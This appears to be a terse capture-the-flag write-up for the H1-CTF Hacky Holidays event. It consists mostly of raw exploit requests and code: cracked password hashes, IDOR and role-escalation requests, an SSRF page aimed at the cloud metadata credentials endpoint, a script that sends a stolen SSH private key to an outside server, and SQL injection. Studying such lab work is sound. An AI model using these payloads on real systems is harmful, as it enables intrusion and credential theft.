H1-CTF Hacky Holidays Writeup

Part One

Warning: Undefined array key "password" in /var/www/html/public/_harvester_/code/harvest.php on line 19
INSERT INTO `users` (`id`, `username`, `password`, `salt`, `locked`) VALUES 
(1, 'bob', '5de402c02cbf657370d179808f26d450', '564315833g', 1),
(2, 'jim', '2309467bac72082e270195f5a43303d0', 'angelae', 1),
(3, 'grinch', '0273f802f2882bcd5daf8f08a3fee512', 'pare
2309467bac72082e270195f5a43303d0:angelae:austin
5de402c02cbf657370d179808f26d450:564315833g:freedom

Part Two

Part-Two Summary
$.get('api/name?id=2',function(resp){
$('#name').html( resp.value );
});
$.get('api/address?id=c81e728d9d4c2f636f067f89cc14862c',function(resp){
$('#address').html( resp.value );
});
$.get('api/position?id=eyJ1c2VyX2lkIjoyfQ==',function(resp){
$('#position').html( resp.value );
});
$.get('api/image',function(resp){
$('#profilepic').attr('src',resp.value );
});
$.get('api/salary?id=2',function(resp){
$('#salary').html( resp.value );
});
$.get('api/dob?id=2',function(resp){
$('#dob').html( resp.value );
});
{"message":"Payment Received, account upgraded"}
default.get("https://intranet.hackyholidays.h1ctf.com/api/christmasList",{headers:{Authorization:'Bearer MjJlNzA1ZDY4OWZiYzE4MTk5Mjc2NzgwNDU2MGQ0YTYgIC0K'},params:{flag:!1}})
GET /api/christmasList?flag=true HTTP/1.1
Host: intranet.hackyholidays.h1ctf.com
Authorization: Bearer MjJlNzA1ZDY4OWZiYzE4MTk5Mjc2NzgwNDU2MGQ0YTYgIC0K

Part Three

POST /p/../v1/users/5 HTTP/1.1
Host: c2.hackyholidays.h1ctf.com
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 34
email=akshansh%40example.com=>graham.rinch@this.is.h1.101.h1ctf.com
POST /settings/ HTTP/1.1
Host: c2.hackyholidays.h1ctf.com
Cookie: candc_token=319fdd7782e96b43d5da3c5ce7be6e98
password=akshansh5%40this.is.h1.101.h1ctf.com&role=admin
POST /register/ HTTP/1.1
Host: c2.hackyholidays.h1ctf.com
email=akshansh51%40this.is.h1.101.h1ctf.com&password=akshansh51%40this.is.h1.101.h1ctf.com&c_password=akshansh51%40this.is.h1.101.h1ctf.com&role=admin
<!DOCTYPE html>
<html>
<body onload=window.location='http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance'>
</body>
</html>
<script>
// Fetch the file through the SSRF-reachable origin, then post its contents to the collecting server.
async function getc2serverdata(){
  const response = await fetch('https://c2.hackyholidays.h1ctf.com/~/.ssh/id_rsa');
  const resp_value = await response.text();
  await fetch('http://myserver.com', {
    method: 'POST',
    headers: {
      'Content-Type': 'application/x-www-form-urlencoded'
    },
    body: JSON.stringify({
      'ssrf_data': resp_value
    })
  });
}
// The original called an undefined send(); the function defined above is the one that has to run.
getc2serverdata();
</script>
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://github.com/grinch-networks-two/directory-protector
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
remote = origin
merge = refs/heads/main
Day Eleven Flag: Come back tomorrow for more fun :)
Request Blocked using Directory Protector
private function expectedKeyword($codewords){
    // One codeword per line; the index is the server's current hour (0-23) plus minute (0-59).
    $words = explode(PHP_EOL, file_get_contents($codewords));
    $line = intval(date("G")) + intval(date("i"));
    return $words[$line];
}
<?php
// Local recreation of expectedKeyword(): same index formula, with the timezone and inputs echoed for comparison.
$codewrd = explode("\n", file_get_contents("code.txt"));
$line = intval(date("G")) + intval(date("i"));
echo json_encode(array(
    "authorised" => true,
    "codeword" => $codewrd[$line],
    "timezone" => date_default_timezone_get(),
    "G" => date("G"),
    "i" => date("i"),
    "line" => $line
));
GET /infrastructure_management/ HTTP/1.1
Host: c2.hackyholidays.h1ctf.com
Cookie: authorisation_token=eyJzZXJ2ZXIiOiAiZXhhbXBsZS5jb20vY2hhbGwucGhwIyIsICJ0b2tlbiI6ICJhIn0=
<script>
let users = {};
// Pulls every username from the server and keeps them client-side for the login form check.
$.get('../get_column?column=username', function(resp){
  $.each(resp, function(k, v){
    users[v] = true;
  });
  console.log(users);
});
$('.loginfrm').click(function(){
  let u = $('input[name="username"]').val();
  if( !users.hasOwnProperty(u) ){
    alert('Username cannot be found');
    return false;
  }
});
</script>
</body>
GET /infrastructure_management/get_column?column=SUBSTR((SELECT+INFO+FROM+information_schema.PROCESSLIST+WHERE+INFO+LIKE+'SELECT+*,SLEE%25'),1,10)